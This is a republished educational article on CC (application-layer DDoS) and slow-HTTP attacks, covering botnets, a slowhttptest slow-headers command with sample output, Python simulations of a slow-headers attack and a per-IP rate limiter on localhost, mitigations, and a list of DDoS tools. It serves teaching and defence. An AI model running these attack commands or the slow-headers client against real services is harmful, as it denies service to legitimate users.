Understanding CC Attacks and Slow DDoS: Mechanisms, Tools, and Defenses

This article explains how CC (Challenge Collapsar) attacks and their slow‑request variants overwhelm web services, describes the underlying botnet concepts, shows practical attack commands with tools like slowhttptest, and outlines multiple mitigation strategies such as rate limiting, IP hiding, high‑protection IP services, and static page optimization.

dbaplus Community

Background of a Real‑World Incident

Several years ago an e‑commerce platform suffered a massive CC (Challenge Collapsar) attack that nearly took the whole site down. At 10:00 traffic monitoring showed unique visitors (UV) and distinct client IP counts jump by several thousand times within minutes. CPU on the application servers was exhausted, responses slowed to a crawl, and outbound bandwidth was saturated, so users saw blank pages and error messages.

The attack coincided with a limited‑edition product launch. The attackers had registered huge numbers of accounts in advance through a phone‑verification (SMS code) service, prepared request scripts, and distributed them across many proxies and compromised machines ("zombies"), so that each individual request looked like an ordinary shopper trying to buy the item.

Fundamental Concepts

Zombie hosts & botnets : Compromised computers (PCs, phones, cloud VMs) that run malware giving an attacker remote control and are coordinated as a botnet through a command‑and‑control channel.

Meat chicken (肉鸡) machines : Chinese slang for a zombie, i.e. any device an attacker can control, whether or not it is enrolled in an organized botnet.

DDoS : Distributed Denial of Service, in which many sources flood a target with requests that individually look legitimate, exhausting CPU, memory, connection slots, or bandwidth so that real users are locked out.

CC attack (Challenge Collapsar, originally called the Fatboy attack; the name mocks the Collapsar anti‑DDoS product it was built to defeat) : An application‑layer DDoS in which attackers use proxies or zombies to send a continuous stream of well‑formed HTTP requests, typically to expensive dynamic pages (search, login, order placement), so that the backend burns CPU and database capacity on each one. Because every request is valid HTTP from a distinct source, simple packet filtering does not catch it.

Slow Attack Variants

Slow attacks target servers that dedicate a worker (thread or process) to each connection and hold that worker until the full HTTP request has arrived and the response has been sent; Apache's prefork and worker MPMs are the classic case, while event‑driven servers such as Nginx are far less exposed. A few hundred connections that never finish their request can pin every worker, and the attacker spends almost no bandwidth doing it, so a single laptop can take down a site that would shrug off a volumetric flood.

1. Slow headers : The attacker opens a connection, sends the request line and a few headers, and then drips additional headers extremely slowly (e.g., one every 10 seconds) without ever sending the blank line that terminates the request head. The server keeps waiting for the rest of the headers and the worker stays tied up.

Example command using slowhttptest (-H selects slow‑headers mode, -c 1000 opens 1000 connections, -l 300 runs the test for 300 seconds, -u gives the target URL; the other values echoed below are what the tool reported for this run):

slowhttptest -H -c 1000 -l 300 -u http://192.168.2.16/test/

Sample output:

slowhttptest version 1.7
- https://code.google.com/p/slowhttptest/ -
test type:               SLOW HEADERS
number of connections:   1000
URL:                     http://192.168.2.16/test/
verb:                    GET
Content‑Length header value: 4096
follow up data max size: 68
interval between follow up data: 10 seconds
connections per seconds: 50
probe connection timeout: 5 seconds
test duration:           300 seconds
using proxy:            no proxy

Resulting connection statistics (example). slowhttptest reports connections that are being opened (initializing), waiting for the server to accept them (pending), accepted and held open (connected), and already dropped (closed). It also opens a separate probe connection that behaves like a normal client; "service available: NO" means that probe got no response within the probe timeout, i.e. the target is effectively down for real users:

initializing: 0
pending: 426
connected: 407
error: 0
closed: 167
service available: NO

2. Slow body (slowhttptest -B) : The attacker sends a POST request with a large Content‑Length header and then transmits the body a few bytes at a time, so the server keeps the worker waiting for a body that never completes.

3. Slow read (slowhttptest -X) : After sending a complete request for a large response, the client reads the reply at a very low rate (or not at all), advertising a tiny or zero TCP receive window so the server cannot push more data and must keep the connection and its send buffer around.
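To make the mechanism concrete, here is an added simulation (written for this article, not taken from the original page or from slowhttptest) of the slow‑headers variant against a thread‑per‑connection server on 127.0.0.1. The server runs a pool of four workers; the attacker holds four connections that never finish their request head, dripping a bogus header every 0.2 s the way slowhttptest -H does with -i; a probe then plays the part of a normal client, exactly like slowhttptest's "service available" check. Three timeout policies are compared: no timeout at all, a per‑packet idle timeout (which the drip defeats), and a hard deadline on the whole request head, which is what Nginx's client_header_timeout and Apache's mod_reqtimeout enforce. Worker count, timings and the header names are arbitrary choices for the demo.

```python
# Slow-headers attack vs. a thread-per-connection server on 127.0.0.1.
# Illustrative code (not slowhttptest's own); no real target is touched.
import socket
import threading
import time
from concurrent.futures import ThreadPoolExecutor

OK_RESP = b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok"
TIMEOUT_RESP = b"HTTP/1.1 408 Request Timeout\r\nContent-Length: 0\r\nConnection: close\r\n\r\n"

def handle(conn, policy, limit):
    """Worker: read until the blank line ending the request head, then answer.
    policy "none": wait forever (vulnerable default).
    policy "idle": per-recv idle timeout, reset by every byte, so dripping
                   one header per tick keeps the worker pinned.
    policy "deadline": hard cap on the whole head (what Nginx
                   client_header_timeout / Apache mod_reqtimeout enforce)."""
    deadline = time.monotonic() + limit
    head = b""
    try:
        while b"\r\n\r\n" not in head:
            if policy == "none":
                conn.settimeout(None)
            elif policy == "idle":
                conn.settimeout(limit)
            else:
                remaining = deadline - time.monotonic()
                if remaining <= 0:
                    raise socket.timeout
                conn.settimeout(remaining)
            chunk = conn.recv(4096)
            if not chunk:
                return
            head += chunk
        conn.sendall(OK_RESP)
    except socket.timeout:
        try:
            conn.sendall(TIMEOUT_RESP)
        except OSError:
            pass
    except OSError:
        pass
    finally:
        conn.close()

def serve(ports, workers, policy, limit, stop):
    """Accept loop feeding a fixed pool of `workers`; extra connections queue."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(64)
    srv.settimeout(0.1)
    ports.append(srv.getsockname()[1])
    with ThreadPoolExecutor(max_workers=workers) as pool:
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            pool.submit(handle, conn, policy, limit)
    srv.close()

def slow_headers(port, count, interval, stop):
    """slowhttptest -H behaviour: open `count` connections, send a request
    line and some headers but never the terminating blank line, then drip one
    bogus header every `interval` seconds until told to stop."""
    socks = [socket.create_connection(("127.0.0.1", port)) for _ in range(count)]
    for s in socks:
        s.sendall(b"GET /test/ HTTP/1.1\r\nHost: target\r\nUser-Agent: slow\r\n")
    tick = 0
    while not stop.wait(interval):
        tick += 1
        for s in socks:
            try:
                s.sendall(b"X-a%d: b\r\n" % tick)
            except OSError:
                pass  # the server already gave up on this connection
    for s in socks:
        s.close()

def probe(port, timeout):
    """A normal client: complete request, expects a 200 within `timeout`."""
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.1\r\nHost: target\r\n\r\n")
            return s.recv(64).startswith(b"HTTP/1.1 200")
    except OSError:
        return False

def run_demo(policy, limit=0.5, workers=4, attackers=4, drip=0.2, probe_timeout=1.0):
    """Pin every worker with slow connections, then check whether a normal
    client is still served. Returns True if the service stayed available."""
    ports, stop = [], threading.Event()
    server = threading.Thread(target=serve, args=(ports, workers, policy, limit, stop), daemon=True)
    server.start()
    while not ports:
        time.sleep(0.01)
    attacker = threading.Thread(target=slow_headers, args=(ports[0], attackers, drip, stop), daemon=True)
    attacker.start()
    time.sleep(0.2)  # let the workers pick up the half-sent requests
    available = probe(ports[0], probe_timeout)
    stop.set()
    attacker.join()
    server.join()
    return available

if __name__ == "__main__":
    for policy in ("none", "idle", "deadline"):
        print(f"{policy:9s} service available: {'YES' if run_demo(policy) else 'NO'}")
```

Running it prints NO, NO, YES: an idle timeout that resets on every byte is no protection against a client that sends one byte per tick, while a deadline on the complete head frees the worker after 0.5 s and the probe gets its 200. The same logic applies to the slow‑body and slow‑read variants, with one caveat: Nginx's client_header_timeout covers the whole header, but client_body_timeout and send_timeout are idle timeouts between successive reads or writes, so for those variants you rely on Nginx being event‑driven (a pinned connection costs a socket, not a worker) or on Apache mod_reqtimeout's MinRate options, which enforce a minimum data rate. Raising the worker count only raises the number of connections the attacker needs; a reverse proxy that buffers the complete request before handing it to a thread‑based backend is the structural fix.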

Mitigation Strategies

1. IP rate limiting : Configure the gateway (Nginx limit_req, Apache mod_evasive or mod_qos, a Zuul or other API‑gateway filter) to cap requests per client IP per second or minute and reject or delay the excess. On its own this is weak against a distributed CC, because the load is already spread across many proxies and zombies; it mostly stops the crude single‑source flood and must be combined with per‑account and per‑session limits.

2. User‑group routing : Route newly registered accounts and long‑standing users to separate server groups, so that a flood of freshly created (and probably scripted) accounts can only saturate its own pool while established customers stay unaffected.

3. Port change : Temporarily move the service to a non‑standard port to disrupt an ongoing attack. This only buys time: attackers rescan and adapt, and real users have to be redirected as well.

4. High‑protection IP services : Use DDoS‑mitigation providers that filter traffic before it reaches the origin server, offering massive bandwidth and IP black‑listing based on behavior analysis.

5. Page staticization : Pre‑render pages, serve static assets from a CDN, and cut backend calls so that traffic spikes hit caches instead of application servers. Caching only helps for cacheable content, though: CC tools deliberately target dynamic endpoints and append random query strings to force every request through to the origin.

6. Hide real IP : Put the origin behind a CDN or high‑protection IP so that only the provider's addresses are public, restrict the origin to accept traffic only from the provider's ranges, and make sure the business host never makes direct outbound connections (mail, callbacks, webhooks) that reveal its address. Check that forgotten sub‑domains, historical DNS records and MX records do not still point at the origin; one leaked record makes the whole protection layer bypassable.
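As a worked illustration of item 1 (added here; it is not Nginx code or code from the original article), the following Python models the per‑IP accounting of Nginx's limit_req directive, which is a leaky bucket kept in integer milli‑requests: each request adds 1000, the excess drains at the configured rate, and a request is refused with 503 once the excess exceeds burst. It then replays constructed traffic (not real logs) from an ordinary visitor and a flood source through a limiter configured like `limit_req_zone $binary_remote_addr zone=perip:10m rate=10r/s; limit_req zone=perip burst=20 nodelay;`. The IP addresses are documentation ranges chosen for the example.

```python
# Per-client-IP rate limiting modelled on Nginx limit_req (leaky bucket, nodelay).
# Illustrative code with constructed traffic, not Nginx's own implementation.
from collections import defaultdict


class PerIpLimiter:
    """Leaky bucket in integer milli-requests, as Nginx accounts it.

    Equivalent configuration (assumed for the example):
        limit_req_zone $binary_remote_addr zone=perip:10m rate=10r/s;
        limit_req zone=perip burst=20 nodelay;
    `rate` is how fast a client's excess drains; `burst` is how much excess is
    tolerated before requests are refused (Nginx answers 503 by default). With
    nodelay, accepted requests are served at once; without it the ones inside
    the burst would instead be delayed to pace them out at `rate`.
    """

    def __init__(self, rate_rps, burst):
        self.rate = rate_rps * 1000     # milli-requests drained per second
        self.burst = burst * 1000       # max tolerated excess, milli-requests
        self.state = {}                 # ip -> [excess, last_accepted_ms]

    def allow(self, ip, now_ms):
        st = self.state.get(ip)
        if st is None:
            self.state[ip] = [0, now_ms]   # first request from a key is free
            return True
        excess, last = st
        # drain what leaked out since the last accepted request, add this one
        excess = excess - self.rate * (now_ms - last) // 1000 + 1000
        if excess < 0:
            excess = 0
        if excess > self.burst:
            return False                   # refused; state left untouched
        st[0], st[1] = excess, now_ms
        return True


def replay(limiter, requests):
    """Feed (timestamp_ms, ip) pairs through the limiter in time order.
    Returns {ip: (accepted, refused)}."""
    counts = defaultdict(lambda: [0, 0])
    for ts_ms, ip in sorted(requests):
        counts[ip][0 if limiter.allow(ip, ts_ms) else 1] += 1
    return {ip: tuple(c) for ip, c in counts.items()}


def constructed_traffic():
    """Constructed access log, not captured data: one ordinary visitor at
    2 req/s for 10 s and one flood source at 100 req/s for 1 s."""
    visitor = [(i * 500, "203.0.113.7") for i in range(20)]
    flood = [(i * 10, "198.51.100.42") for i in range(100)]
    return visitor + flood


if __name__ == "__main__":
    for ip, (ok, dropped) in replay(PerIpLimiter(10, 20), constructed_traffic()).items():
        print(f"{ip:16s} accepted={ok:3d} refused(503)={dropped:3d}")
```

The visitor at 2 req/s is never refused. The flood source at 100 req/s gets 23 requests through in the first 230 ms (the free first request plus the burst, padded slightly by the drain that happens during the burst) and then exactly one per 100 ms, for 30 accepted and 70 refused out of 100. The caveat for CC attacks is that this is per source IP: an attacker spreading 100 req/s over 50 proxies stays under the limit on every one of them, while a corporate NAT or mobile carrier gateway that legitimately fronts thousands of users will trip it. Per‑IP limits are therefore a first layer, to be combined with per‑account or per‑session limits and with the behavioural analysis that high‑protection services perform.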

Common Distributed Attack Tools

LOIC – a GUI‑based tool written in C# that can flood a target with TCP/UDP/HTTP traffic.

HULK – Python script that generates a large volume of unique HTTP requests (randomized user agents, referrers and query strings) so that caches are bypassed and every request reaches the backend.

Darkddoser – uses botnets to launch HTTP attacks.

Slowhttptest – configurable tool for slow‑header, slow‑body, slow‑read, and other slow‑request attacks.

Zarp – Python‑based framework offering scanning, sniffing, and DDoS stress testing.

Conclusion

While no system can be made completely invulnerable, a layered defense that includes rate limiting, IP hiding, high‑capacity mitigation services, and careful architecture (e.g., event‑based servers) can significantly reduce the risk and impact of CC and other DDoS attacks.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Written by

dbaplus Community

Enterprise-level professional community for Database, BigData, and AIOps. Daily original articles, weekly online tech talks, monthly offline salons, and quarterly XCOPS&DAMS conferences—delivered by industry experts.
